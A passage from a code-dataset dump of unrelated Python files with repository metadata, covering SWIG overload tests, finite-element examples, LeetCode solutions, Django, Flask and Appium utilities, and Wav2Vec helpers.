raise RuntimeError, ("overtparams1(int)")
if (overtparams1(100.0, 100) != 20):
raise RuntimeError, ("overtparams1(double, int)")
# Combination 2
if (overtparams2(100.0, 100) != 40):
raise RuntimeError, ("overtparams2(double, int)")
# Combination 3
if (overloaded() != 60):
raise RuntimeError, ("overloaded()")
if (overloaded(100.0, 100) != 70):
raise RuntimeError, ("overloaded(double, int)")
# Combination 4
if (overloadedagain("hello") != 80):
raise RuntimeError, ("overloadedagain(const char *)")
if (overloadedagain() != 90):
raise RuntimeError, ("overloadedagain(double)")
# specializations
if (specialization(10) != 202):
raise RuntimeError, ("specialization(int)")
if (specialization(10.0) != 203):
raise RuntimeError, ("specialization(double)")
if (specialization(10, 10) != 204):
raise RuntimeError, ("specialization(int, int)")
if (specialization(10.0, 10.0) != 205):
raise RuntimeError, ("specialization(double, double)")
if (specialization("hi", "hi") != 201):
raise RuntimeError, ("specialization(const char *, const char *)")
# simple specialization
xyz()
xyz_int()
xyz_double()
# a bit of everything
if (overload("hi") != 0):
raise RuntimeError, ("overload()")
if (overload(1) != 10):
raise RuntimeError, ("overload(int t)")
if (overload(1, 1) != 20):
raise RuntimeError, ("overload(int t, const int &)")
if (overload(1, "hello") != 30):
raise RuntimeError, ("overload(int t, const char *)")
k = Klass()
if (overload(k) != 10):
raise RuntimeError, ("overload(Klass t)")
if (overload(k, k) != 20):
raise RuntimeError, ("overload(Klass t, const Klass &)")
if (overload(k, "hello") != 30):
raise RuntimeError, ("overload(Klass t, const char *)")
if (overload(10.0, "hi") != 40):
raise RuntimeError, ("overload(double t, const char *)")
if (overload() != 50):
raise RuntimeError, ("overload(const char *)")
# everything put in a namespace
if (nsoverload("hi") != 1000):
raise RuntimeError, ("nsoverload()")
if (nsoverload(1) != 1010):
raise RuntimeError, ("nsoverload(int t)")
if (nsoverload(1, 1) != 1020):
raise RuntimeError, ("nsoverload(int t, const int &)")
if (nsoverload(1, "hello") != 1030):
raise RuntimeError, ("nsoverload(int t, const char *)")
if (nsoverload(k) != 1010):
raise RuntimeError, ("nsoverload(Klass t)")
if (nsoverload(k, k) != 1020):
raise RuntimeError, ("nsoverload(Klass t, const Klass &)")
if (nsoverload(k, "hello") != 1030):
raise RuntimeError, ("nsoverload(Klass t, const char *)")
if (nsoverload(10.0, "hi") != 1040):
raise RuntimeError, ("nsoverload(double t, const char *)")
if (nsoverload() != 1050):
raise RuntimeError, ("nsoverload(const char *)")
A_foo(1)
b = B()
b.foo(1)
|
[
"inishchith@gmail.com"
] |
inishchith@gmail.com
|
ff962c602c1f68d63c7883569742a8670659f422
|
e6b45b6cc01a921c3cc510f1a5fff3074dd6b2dd
|
/example_update1/PoissonFEMWithRobinBC_example.py
|
3ff8c61a39419d78d70757f91ba1ecd69df871af
|
[] |
no_license
|
yoczhang/FEALPyExamples
|
3bd339bd5f4576630f767a758da9590a1c068410
|
44d9acbecb528374bc67bba50c62711384228d39
|
refs/heads/master
| 2023-07-24T21:35:50.633572
| 2023-07-05T02:28:13
| 2023-07-05T02:28:13
| 208,667,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,646
|
py
|
#!/usr/bin/env python3
#
import sys
import numpy as np
from scipy.sparse.linalg import spsolve
import matplotlib.pyplot as plt
import pyamg
from fealpy.functionspace import LagrangeFiniteElementSpace
from fealpy.boundarycondition import RobinBC
from fealpy.tools.show import showmultirate
p = int(sys.argv[1])
n = int(sys.argv[2])
maxit = int(sys.argv[3])
d = int(sys.argv[4])
if d == 2:
from fealpy.pde.poisson_2d import CosCosData as PDE
elif d == 3:
from fealpy.pde.poisson_3d import CosCosCosData as PDE
pde = PDE()
mesh = pde.init_mesh(n=n)
errorType = ['$|| u - u_h||_{\Omega,0}$',
'$||\\nabla u - \\nabla u_h||_{\Omega, 0}$'
]
errorMatrix = np.zeros((2, maxit), dtype=np.float)
NDof = np.zeros(maxit, dtype=np.float)
for i in range(maxit):
space = LagrangeFiniteElementSpace(mesh, p=p)
NDof[i] = space.number_of_global_dofs()
uh = space.function()
A = space.stiff_matrix()
F = space.source_vector(pde.source)
bc = RobinBC(space, pde.robin)
A, F = bc.apply(A, F)
#uh[:] = spsolve(A, F).reshape(-1)
ml = pyamg.ruge_stuben_solver(A)
uh[:] = ml.solve(F, tol=1e-12, accel='cg').reshape(-1)
errorMatrix[0, i] = space.integralalg.error(pde.solution, uh.value)
errorMatrix[1, i] = space.integralalg.error(pde.gradient, uh.grad_value)
if i < maxit-1:
mesh.uniform_refine()
if d == 2:
fig = plt.figure()
axes = fig.gca(projection='3d')
uh.add_plot(axes, cmap='rainbow')
elif d == 3:
print('The 3d function plot is not been implemented!')
showmultirate(plt, 0, NDof, errorMatrix, errorType, propsize=20)
plt.show()
|
[
"yoczhang@126.com"
] |
yoczhang@126.com
|
cea744c519951b1d792842fa074670506fc24208
|
760e1c14d056dd75958d367242c2a50e829ac4f0
|
/bit/338_counting_bits.py
|
81ff431da8a2934e28c5d1339ee654906a25b2a5
|
[] |
no_license
|
lawtech0902/py_imooc_algorithm
|
8e85265b716f376ff1c53d0afd550470679224fb
|
74550d68cd3fd2cfcc92e1bf6579ac3b8f31aa75
|
refs/heads/master
| 2021-04-26T22:54:42.176596
| 2018-09-23T15:45:22
| 2018-09-23T15:45:22
| 123,894,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,266
|
py
|
# _*_ coding: utf-8 _*_
"""
__author__ = 'lawtech'
__date__ = '2018/9/3 下午4:25'
给定一个非负整数 num。对于 0 ≤ i ≤ num 范围中的每个数字 i ,计算其二进制数中的 1 的数目并将它们作为数组返回。
示例 1:
输入: 2
输出: [0,1,1]
示例 2:
输入: 5
输出: [0,1,1,2,1,2]
进阶:
给出时间复杂度为O(n*sizeof(integer))的解答非常容易。但你可以在线性时间O(n)内用一趟扫描做到吗?
要求算法的空间复杂度为O(n)。
你能进一步完善解法吗?要求在C++或任何其他语言中不使用任何内置函数(如 C++ 中的 __builtin_popcount)来执行此操作。
考虑二进制数的规律。[000,001,010,011,100,101,110,111],分别对应[0,1,2,3,4,5,6,7]。
从上述二进制数可以看出来,4-7的二进制数既是对0-3的二进制数的最高位从0变成1,也就是说后面的二进制数都是在之前所有二进制的最高位加一位1。
"""
class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
res = [0]
for i in range(1, num + 1):
res.append(res[i & (i - 1)] + 1)
return res
if __name__ == '__main__':
print(Solution().countBits(5))
|
[
"584563542@qq.com"
] |
584563542@qq.com
|
dc12825f1785f0eceb733db879c05efe907c1ac8
|
e912af291e1457c61606642f1c7700e678c77a27
|
/python/532_k-diff_pairs_in_an_array.py
|
b3078a0372260afbe3f7744d4defba6a128add92
|
[] |
no_license
|
MakrisHuang/LeetCode
|
325be680f8f67b0f34527914c6bd0a5a9e62e9c9
|
7609fbd164e3dbedc11308fdc24b57b5097ade81
|
refs/heads/master
| 2022-08-13T12:13:35.003830
| 2022-07-31T23:03:03
| 2022-07-31T23:03:03
| 128,767,837
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
class Solution:
def findPairs(self, nums: List[int], k: int) -> int:
if k > 0:
return len(set(nums) & set(n + k for n in nums))
elif k == 0:
return sum(v > 1 for v in collections.Counter(nums).values())
else:
return 0
|
[
"vallwesture@gmail.com"
] |
vallwesture@gmail.com
|
3b7afc565fc2ff0482cafb249736d156f6f05efc
|
59166105545cdd87626d15bf42e60a9ee1ef2413
|
/test/test_ice_hockey_league.py
|
c6490a78cce2303eb5bfa685c644b362d39686a4
|
[] |
no_license
|
mosoriob/dbpedia_api_client
|
8c594fc115ce75235315e890d55fbf6bd555fa85
|
8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc
|
refs/heads/master
| 2022-11-20T01:42:33.481024
| 2020-05-12T23:22:54
| 2020-05-12T23:22:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,309
|
py
|
# coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import dbpedia
from dbpedia.models.ice_hockey_league import IceHockeyLeague # noqa: E501
from dbpedia.rest import ApiException
class TestIceHockeyLeague(unittest.TestCase):
"""IceHockeyLeague unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IceHockeyLeague
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = dbpedia.models.ice_hockey_league.IceHockeyLeague() # noqa: E501
if include_optional :
return IceHockeyLeague(
viaf_id = [
'0'
],
leader_function = [
None
],
art_patron = [
None
],
manager_season = [
None
],
secretary_general = [
None
],
number_of_locations = [
56
],
discipline = [
None
],
type = [
'0'
],
revenue = [
1.337
],
affiliation = [
None
],
season = [
None
],
id = '0',
nla_id = [
'0'
],
chairperson = [
None
],
region_served = [
None
],
superintendent = [
None
],
formation_date = [
'0'
],
number_of_employees = [
56
],
extinction_date = [
'0'
],
player_season = [
None
],
endowment = [
1.337
],
number_of_teams = [
56
],
slogan = [
'0'
],
regional_council = [
None
],
location_city = [
None
],
number_of_volunteers = [
56
],
ideology = [
None
],
description = [
'0'
],
membership = [
'0'
],
ceo = [
None
],
formation_year = [
'0'
],
junior_season = [
None
],
headquarter = [
None
],
extinction_year = [
'0'
],
child_organisation = [
None
],
honours = [
None
],
parent_organisation = [
None
],
organisation_member = [
None
],
number_of_staff = [
56
],
product = [
None
],
hometown = [
None
],
foundation_place = [
None
],
national_selection = [
None
],
current_season = [
'0'
],
label = [
'0'
],
legal_form = [
None
],
general_council = [
None
],
trustee = [
None
],
age = [
56
],
main_organ = [
None
]
)
else :
return IceHockeyLeague(
)
def testIceHockeyLeague(self):
"""Test IceHockeyLeague"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"maxiosorio@gmail.com"
] |
maxiosorio@gmail.com
|
ccd797d9bd113bf5dbade1cb215f77a6a5b3b320
|
9d40c348e256bd74455521a7a11d8a4ab5d0d9f0
|
/setup.py
|
b88fc0a1a902044454101d52320b623ab903dd99
|
[] |
no_license
|
tianon/etest
|
acf5bd2f06cf9a5024353cfc8128c3e968b889c2
|
01f24e46caaa3c75c48c43e59a8c03da81e06e3b
|
refs/heads/master
| 2021-01-17T20:11:43.244552
| 2015-05-03T15:10:06
| 2015-05-03T15:10:33
| 36,564,139
| 0
| 0
| null | 2015-05-30T15:38:31
| 2015-05-30T15:38:31
| null |
UTF-8
|
Python
| false
| false
| 2,447
|
py
|
# Copyright (C) 2014 by Alex Brandt <alunduil@alunduil.com>
#
# etest is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
import os
from setuptools import setup, find_packages
from codecs import open
with open(os.path.join('etest', 'information.py'), 'r', encoding = 'utf-8') as fh:
exec(fh.read(), globals(), locals())
PARAMS = {}
PARAMS['name'] = NAME # flake8: noqa — provided by exec
PARAMS['version'] = VERSION # flake8: noqa — provided by exec
PARAMS['description'] = DESCRIPTION # flake8: noqa — provided by exec
with open('README.rst', 'r', encoding = 'utf-8') as fh:
PARAMS['long_description'] = fh.read()
PARAMS['url'] = URL # flake8: noqa — provided by exec
PARAMS['author'] = AUTHOR # flake8: noqa — provided by exec
PARAMS['author_email'] = AUTHOR_EMAIL # flake8: noqa — provided by exec
PARAMS['license'] = LICENSE # flake8: noqa — provided by exec
PARAMS['classifiers'] = [
'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
'Topic :: Utilities',
]
PARAMS['keywords'] = [
'ebuild',
'test',
'gentoo',
'portage',
'emerge',
]
PARAMS['packages'] = find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
PARAMS['package_data'] = {
'etest.parsers': [ 'bash.p' ],
}
PARAMS['install_requires'] = [
'click',
'docker-py',
'ply',
]
PARAMS['test_suite'] = 'nose.collector'
PARAMS['tests_require'] = [
'coverage'
'nose',
]
PARAMS['entry_points'] = {
'console_scripts': [
'etest = etest:etest',
],
}
PARAMS['data_files'] = [
('share/doc/{P[name]}-{P[version]}'.format(P = PARAMS), [
'README.rst',
]),
]
setup(**PARAMS)
|
[
"alunduil@alunduil.com"
] |
alunduil@alunduil.com
|
449664c6a652f208251835430b04392c9f31857d
|
457d07994582657539a52d2fe8b7c24557ecc1fb
|
/service10/migrations/0003_auto_20190201_0630.py
|
0bcec6dd58bbb0c6baf0b78d282f64a82370ca3c
|
[] |
no_license
|
ohsehwan/django_admin_nanum
|
952c91452697f1ee7718449ceceaf4e434c3da27
|
0478389d3a44592fd2ee6f025f2b4a66c1a2176e
|
refs/heads/master
| 2022-12-23T01:18:58.124355
| 2019-06-21T07:42:49
| 2019-06-21T07:42:49
| 168,487,820
| 3
| 1
| null | 2022-12-08T01:02:50
| 2019-01-31T08:11:59
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 597
|
py
|
# Generated by Django 2.1.5 on 2019-02-01 06:30
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('service10', '0002_mentor'),
]
operations = [
migrations.CreateModel(
name='article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('html', ckeditor.fields.RichTextField()),
],
),
migrations.DeleteModel(
name='mentor',
),
]
|
[
"dxman@naver.com"
] |
dxman@naver.com
|
55f57819c1d4758954960879bf878e26885de0ae
|
e992b76761d2cc95e55d8c21f78f9636b0f74aae
|
/caches/__init__.py
|
1611d10b35c4da8ec7150bb0321420534a499a69
|
[
"MIT"
] |
permissive
|
Jaymon/caches
|
7d61bed61ef8d3dc8a328ee037c14a4fc994e98f
|
3e2aa5fcf51e8de80bea46eb117b73fb1f398e53
|
refs/heads/master
| 2023-07-20T23:13:55.461196
| 2023-07-12T20:33:49
| 2023-07-12T20:33:49
| 12,884,773
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,162
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import logging
from caches.compat import *
from caches.core import (
Cache,
DictCache,
SetCache,
SortedSetCache,
SentinelCache,
)
from .interface import get_interfaces, get_interface, set_interface
from .dsn import configure, configure_environ
from .decorators import cached
__version__ = '3.0.0'
logger = logging.getLogger(__name__)
def unsafe_clear(pattern):
"""Clear the keys matching pattern
This uses scan to find keys matching pattern (eg, foo*) and delets them one
at a time
https://github.com/redis/redis/issues/2042
https://stackoverflow.com/a/4006575/5006
:param pattern: str, something like foo* or *bar*
:returns: int, how many keys were deleted
"""
count = 0
for connection_name, inter in get_interfaces().items():
# https://redis.io/commands/scan
# https://stackoverflow.com/a/34166690/5006
for key in inter.scan_iter(match=pattern, count=500):
inter.delete(String(key))
count += 1
return count
configure_environ()
|
[
"jay@marcyes.com"
] |
jay@marcyes.com
|
5edeb038cd1f87c8aac071184fd2fef2036abf0b
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/cs61a/untarred backup/122.py
|
887a81dc01674a92d8b5e6f55aff075abf43e9b7
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
def num_common_letters(goal_word, guess):
"""Returns the number of letters in goal_word that are also in guess.
As per the rules of the game, goal_word cannot have any repeated
letters, but guess is allowed to have repeated letters.
goal_word and guess are assumed to be of the same length.
goal_word and guess are both instances of the word ADT.
>>> mwfs, mwfl = make_word_from_string, make_word_from_list
>>> num_common_letters(mwfs('steal'), mwfs('least'))
5
>>> num_common_letters(mwfs('steal'), mwfl(['s', 't', 'e', 'e', 'l']))
4
>>> num_common_letters(mwfl(['s', 't', 'e', 'a', 'l']), mwfs('thief'))
2
>>> num_common_letters(mwfl(['c', 'a', 'r']), mwfl(['p', 'e', 't']))
0
"""
goal_letters = get_list(goal_word)
guess_letters = get_list(guess)
common = 0
for guess_letter in guess_letters:
if guess_letter in goal_letters:
common += 1
goal_letters = [letter for letter in goal_letters if letter != guess_letter]
return common
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
cea269f71a06be2e88bab6c122be7e5ec8d08c22
|
8a6c1d9ff5f469774ca4651d46f212474b3435bf
|
/base/base_driver.py
|
8d5ef05be8b058f89c05bfb1479b57f4c18c3888
|
[] |
no_license
|
yuanyue888666/test_jinkens_001
|
67a68378dc518e3033a4563f0530adeb530a8646
|
b553d0348d967cdb6e25c7d1a46746b75f6d9512
|
refs/heads/master
| 2020-04-27T15:46:15.202764
| 2019-03-08T03:42:47
| 2019-03-08T03:42:47
| 174,459,619
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
from appium import webdriver
def init_driver():
"""
只要调用,就可以打开对应的应用程序
:return:
"""
# server 启动参数
desired_caps = {}
# 设备信息
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1'
desired_caps['deviceName'] = '192.168.56.101:5555'
# app的信息
desired_caps['appPackage'] = 'com.android.contacts'
desired_caps['appActivity'] = '.activities.PeopleActivity'
# 不要重置应用
desired_caps['noReset'] = True
# 声明我们的driver对象
return webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
|
[
"johndoe@example.com"
] |
johndoe@example.com
|
9808dd7f6cb3c4f34d801fa34e4fda3e2717b5d7
|
a15b050e661c31880acc72465421f3ba4906ef06
|
/0x06-python-classes/101-square.py
|
ffd6008dce8087b7476ce7b4b8aa8ac3e838cdf3
|
[] |
no_license
|
zacwoll/holbertonschool-higher_level_programming
|
0c483195f50a55fe0bfae5cff03c0c86719d8063
|
9c7dda67dc5681fd96b90d6f05ee9748a37ed8b8
|
refs/heads/master
| 2022-12-22T04:54:13.815410
| 2020-09-25T16:03:41
| 2020-09-25T16:03:41
| 259,412,215
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,844
|
py
|
#!/usr/bin/python3
"""Represent a Square Object with a __repr__ toString"""
class Square:
"""A Square"""
def __init__(self, size=0, position=(0, 0)):
"""Init"""
self.__size = size
self.__position = position
def __repr__(self):
"""Square toString"""
to_str = ''
if self.__size == 0:
to_str += '\n'
else:
to_str += ('\n' * self.__position[1])
for i in range(self.__size):
to_str += (' ' * self.__position[0])
to_str += ('#' * self.__size + '\n')
return to_str[:-1]
@property
def size(self):
"""gets the value of size"""
return self.__size
@size.setter
def size(self, value):
"""sets the value of size"""
if type(value) != int:
raise TypeError("size must be an integer")
if value < 0:
raise ValueError("size must be >= 0")
self.__size = value
def area(self):
"""Area of Square"""
return self.__size ** 2
@property
def position(self):
"""gets the value of position"""
return self.__position
@position.setter
def position(self, value):
"""Sets the value of position"""
if type(value) != tuple or len(value) != 2 or \
not all(type(x) == int and x >= 0 for x in a):
raise TypeError('position must be a \
tuple of 2 positive integers')
self.__position = value
def my_print(self):
"""Print the square."""
if self.__size == 0:
print()
else:
print('\n' * self.__position[1], end='')
for i in range(self.__size):
print(' ' * self.__position[0], end='')
print('#' * self.__size)
|
[
"zacwoll@gmail.com"
] |
zacwoll@gmail.com
|
4c19051a43c291779e8c00d44bd6b787249af569
|
20b2d61c0959023cb51be92fafe54877aecb9887
|
/pabi_utils/models/ir_attachment.py
|
574f5bb0a1d036cefea059529c50c697e945ffb3
|
[] |
no_license
|
BTCTON/pb2_addons
|
6841a23554054f859b0c4acafb4e91bd0c3a14e4
|
a5bfd90c202cea894690c96d74a74fa96eb79468
|
refs/heads/master
| 2021-09-07T16:55:41.195667
| 2018-02-26T11:27:01
| 2018-02-26T11:27:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,864
|
py
|
# -*- coding: utf-8 -*-
import logging
import os
from openerp import models, fields, api
_logger = logging.getLogger(__name__)
class IrAttachment(models.Model):
_inherit = 'ir.attachment'
@api.model
def name_search(self, name, args=None, operator='ilike', limit=80):
if self._context.get('domain_template_ids', False):
args += [('id', 'in', self._context['domain_template_ids'][0][2])]
return super(IrAttachment, self).name_search(name=name, args=args,
operator=operator,
limit=limit)
# @api.model
# def load_xlsx_template(self, addon, template_ids, file_dir):
# print addon
# print template_ids
# print file_dir
# for xml_id in template_ids:
# try:
# xmlid = '%s.%s' % (addon, xml_id)
# att = self.env.ref(xmlid)
# file_path = '%s/%s' % (file_dir, att.datas_fname)
# att.datas = open(file_path, 'rb').read().encode('base64')
# except ValueError, e:
# _logger.exception(e.message)
@api.model
def load_xlsx_template(self, att_ids, folder):
for att in self.browse(att_ids):
try:
file_dir = os.path.dirname(os.path.realpath(__file__))
# While can't find better solution, we get the addon dir by
# so, make sure that the calling addon in in the same foloer
# with this pabi_utils
file_dir = file_dir.replace('/pabi_utils/models', '')
file_path = '%s/%s/%s' % (file_dir, folder, att.datas_fname)
att.datas = open(file_path, 'rb').read().encode('base64')
except ValueError, e:
_logger.exception(e.message)
|
[
"kittiu@gmail.com"
] |
kittiu@gmail.com
|
485e5433667081aaf4dc508002d827c07367437d
|
6bc485e593a24354e8ec6ad1284809c5748b7995
|
/workon/contrib/admin2/templatetags/workon_admin_forms.py
|
5e50c0aa768171d3c1ca93e280ff13d4969dbcbe
|
[
"BSD-3-Clause"
] |
permissive
|
dalou/django-workon
|
fba87b6951540d7f059c8fcb79cd556573f56907
|
ef63c0a81c00ef560ed693e435cf3825f5170126
|
refs/heads/master
| 2021-01-20T11:09:49.314839
| 2018-12-29T16:56:08
| 2018-12-29T16:56:08
| 50,340,299
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
from django import template
from ..config import get_config
register = template.Library()
def get_form_size(fieldset):
default_label_class = get_config('form_size').split(':')
# Try fieldset definition at first
size_by_fieldset = get_fieldset_size(fieldset)
if size_by_fieldset:
return size_by_fieldset
# Fallback to model admin definition
ma_sizes = getattr(fieldset.model_admin, 'workon_admin_form_size', None)
if ma_sizes:
return ma_sizes.split(':')
# Use default values at last
return default_label_class
def get_fieldset_size(fieldset):
if fieldset and fieldset.classes and ':' in fieldset.classes:
for cls in fieldset.classes.split(' '):
if ':' in cls:
return cls.split(':')
@register.filter
def workon_admin_form_label_class(field, fieldset):
default_class = get_form_size(fieldset)[0]
if not hasattr(field, 'field'):
return default_class
label_class = field.field.widget.attrs.get('label_class')
if label_class:
return label_class
return default_class
@register.filter
def workon_admin_form_field_class(field, fieldset):
"""
Return classes for form-column
"""
css_classes = []
default_class = get_form_size(fieldset)[1]
css_classes.append('form-column')
if not hasattr(field.field, 'field'):
css_classes.append(default_class)
return ' '.join(css_classes)
widget_py_cls = field.field.field.widget.__class__.__name__
css_classes.append('widget-%s' % widget_py_cls)
if 'RawIdWidget' in widget_py_cls:
css_classes.append('form-inline')
class_by_widget = field.field.field.widget.attrs.get('column_class')
if class_by_widget:
del field.field.field.widget.attrs['column_class']
css_classes.append(class_by_widget)
else:
css_classes.append(default_class)
return ' '.join(css_classes)
|
[
"autrusseau.damien@gmail.com"
] |
autrusseau.damien@gmail.com
|
e7fe710c9c2d6ebda3fbd6abeb440116a6fe2d4b
|
90c6262664d013d47e9a3a9194aa7a366d1cabc4
|
/tests/storage/cases/test_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.py
|
4057d7a5c0281d83115c8389161a41dd451ce6df
|
[
"MIT"
] |
permissive
|
tqtezos/pytezos
|
3942fdab7aa7851e9ea81350fa360180229ec082
|
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
|
refs/heads/master
| 2021-07-10T12:24:24.069256
| 2020-04-04T12:46:24
| 2020-04-04T12:46:24
| 227,664,211
| 1
| 0
|
MIT
| 2020-12-30T16:44:56
| 2019-12-12T17:47:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.json')
def test_storage_encoding_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
|
[
"mz@baking-bad.org"
] |
mz@baking-bad.org
|
6f50d5f2a0f722718cb1480dd3c12c423f57a9ac
|
5f13ce6fb06d86f99ddcc0d8aa16cc4817ec4b03
|
/api.py
|
9c029c70498dce7666c1bcb59689c55d50bada12
|
[] |
no_license
|
news-ai/news-processing
|
1b59f17c24da9f48d35c09db64c98fca18471bb6
|
1b874e186f8b9d8510dd3b47a672a7c08f98e082
|
refs/heads/master
| 2021-03-19T16:42:57.783382
| 2016-06-11T18:26:31
| 2016-06-11T18:26:31
| 58,774,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,493
|
py
|
# Stdlib imports
import logging
# Third-party app imports
from flask import Flask, request, jsonify
from flask.ext.cors import CORS
from flask_restful import Resource, Api, reqparse
from raven.contrib.flask import Sentry
# Imports from app
from middleware.config import (
SENTRY_USER,
SENTRY_PASSWORD,
SENTRY_APP_ID,
)
from processing.process_article import process_article
from taskrunner import app as celery_app
# Setting up Flask and API
app = Flask(__name__)
api = Api(app)
CORS(app)
# Setting up Sentry
sentry = Sentry(
app, dsn='https://' + SENTRY_USER + ':' + SENTRY_PASSWORD + '@app.getsentry.com/' + SENTRY_APP_ID)
logger = logging.getLogger("sentry.errors")
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(levelname)s] %(name)s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# Setting up parser
parser = reqparse.RequestParser()
parser.add_argument('url')
parser.add_argument('added_by')
parser.add_argument('rss_id')
# Route to POST data for news processing
class Processing(Resource):
def post(self):
args = parser.parse_args()
if 'added_by' in args and args['added_by'] is not None:
return process_article(args)
res = celery_app.send_task(
'processing.process_article.process_article', ([args]))
return jsonify({'id': res.task_id})
api.add_resource(Processing, '/processing')
if __name__ == '__main__':
app.run(port=int('8000'), debug=False)
|
[
"me@abhiagarwal.com"
] |
me@abhiagarwal.com
|
b4118ccd20e3a44af5e0864ac2e03dd8488f8d35
|
a6d62bb9f4cb00fea89ff10e27b516890dc8a49a
|
/utils/generic_utils.py
|
57536f8847a50c7ab234709d48cbf404620729cc
|
[
"MIT"
] |
permissive
|
WeberJulian/Wav2Vec-Wrapper
|
dca6be0edd25f67b9a3e2719dc5bee8b0bbdfb4f
|
84519cd51a4f3d9cb61de99c5712640f3cf5213d
|
refs/heads/main
| 2023-06-11T15:26:53.754106
| 2021-07-06T17:13:38
| 2021-07-06T17:13:38
| 383,545,362
| 0
| 0
|
MIT
| 2021-07-06T17:14:03
| 2021-07-06T17:14:03
| null |
UTF-8
|
Python
| false
| false
| 2,816
|
py
|
import os
import re
import yaml
import json
import torch
import numpy as np
from datasets import load_metric
wer_metric = load_metric("wer")
def calculate_wer(pred_ids, labels, processor, debug=False):
labels[labels == -100] = processor.tokenizer.pad_token_id
pred_string = processor.batch_decode(pred_ids)
label_string = processor.batch_decode(labels, group_tokens=False)
wer = wer_metric.compute(predictions=pred_string, references=label_string)
if debug:
print(" > DEBUG: \n\n PRED:", pred_string, "\n Label:", label_string)
return wer
class AttrDict(dict):
"""A custom dict which converts dict keys
to class attributes"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__dict__ = self
def read_json_with_comments(json_path):
# fallback to json
with open(json_path, "r", encoding="utf-8") as f:
input_str = f.read()
# handle comments
input_str = re.sub(r"\\\n", "", input_str)
input_str = re.sub(r"//.*\n", "\n", input_str)
data = json.loads(input_str)
return data
def load_config(config_path: str) -> AttrDict:
"""Load config files and discard comments
Args:
config_path (str): path to config file.
"""
config = AttrDict()
ext = os.path.splitext(config_path)[1]
if ext in (".yml", ".yaml"):
with open(config_path, "r", encoding="utf-8") as f:
data = yaml.safe_load(f)
else:
data = read_json_with_comments(config_path)
config.update(data)
return config
def load_vocab(voba_path):
config = AttrDict()
config.update(read_json_with_comments(voba_path))
return config
def save_best_checkpoint(log_dir, model, optimizer, lr_scheduler, scaler, step, epoch, val_loss, best_loss, early_epochs=None):
if val_loss < best_loss:
best_loss = val_loss
